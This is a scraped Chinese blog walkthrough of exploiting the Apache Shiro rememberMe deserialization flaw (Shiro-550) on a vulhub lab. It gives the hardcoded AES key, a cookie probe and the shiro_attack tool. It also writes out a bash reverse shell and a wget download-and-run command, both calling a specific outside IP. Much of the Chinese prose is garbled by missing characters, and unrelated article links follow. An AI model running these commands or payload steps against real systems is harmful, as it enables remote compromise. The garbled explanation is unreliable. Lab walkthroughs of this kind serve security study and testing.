当前位置: 首页 > article >正文

Shiro框架漏洞攻略

Shiro漏洞原

Shiro框架下,陆成后会⼀个CookieCookieKey值为 RememberMeValue值是过序列化AES密和Base64编码后得到的结

端在接收到⼀个Cookie会按照如⾏解析处

  • RememberMe Cookie
  • Base64
  • AES
  • 反序列化操

在第4步中的调⽤反序列化时未进任何过滤可以导致出发远程代漏洞

于使AES功利⽤该漏洞需获取AES的加密密钥Shiro1.2.4版本之AES的加密密钥为硬编码密钥Base64编码值为kPH+bIxk5D2deZiIxcaaaA==于是就可得Payload构造流程

恶意命令-->列化-->AES-->base64编码-->发送Cookie

⽬前通过去掉硬编码的密钥是每次⼀个密钥来解决其漏洞但可以通过搜索密钥提⾼漏洞的利⽤功率

vulhub靶场 /shiro/CVE-2016-4437

 Shiro  rememberMe反序列化漏洞Shiro-550

 打开靶机网址,直接抓包

在请求包中的cookie字段中添加rememberMe=123;,看响应包  header中是否返回rememberMe=deleteMe值,若有,则证明该系统使⽤了Shiro框架

 使用工具shiro_attack-2.2.jar

shiro_attack⼯具https://github.com/j1anFen/shiro_attack

之后使用蚁剑连接就可以了

反弹shell

在云服务器上写一个反弹shell命令到1.sh

bash -i >& /dev/tcp/39.105.61.160/6666 0>&1

nc监听6666端口

 

 使用shiro_attack⼯具

/usr/bin/wget -qO /temp/1.sh http://39.105.61.160/1.sh

ls /tmp 

/bin/bash /tmp/shw.sh 

这样就可以监听到shell 


http://www.kler.cn/a/599395.html

相关文章:

  • AI 时代,我们需要什么样的数据库?
  • 【全队项目】智能学术海报生成系统PosterGenius(项目介绍)
  • Resource usage
  • Linux系统还可以在做一层虚拟化安装虚拟机吗
  • Web3与网络安全:如何确保去中心化应用的安全性
  • 使用 ChatGPT 套结构仿写解决写作难题
  • Leetcode刷题笔记1 图论part03
  • 【操作系统安全】任务3:Linux 网络安全实战命令手册
  • 【C语言】多进程/多线程
  • python的文件上传
  • 4、操作系统结构和发展史
  • Ubuntu给appimage创建图标启动
  • Jira story与测试用例自动化关联脚本
  • [已解决]jupyter notebook报错 500 : Internal Server Error及notebook闪退
  • [深度学习]图像分类项目-食物分类
  • 为AI聊天工具添加一个知识系统 之148 设计重审 之13 聚合AI 之2
  • Python----计算机视觉处理(Opencv:图像边缘检测:非极大值抑制,双阈值筛选)
  • 算法-回溯算法
  • C++ Json-Rpc框架-3项目实现(1)(1.其它函数实现2.消息类型字段定义3.消息Message/通信Muduo抽象具象实现)
  • 深入解析 Vue3 响应式系统:原理、性能优化与应用场景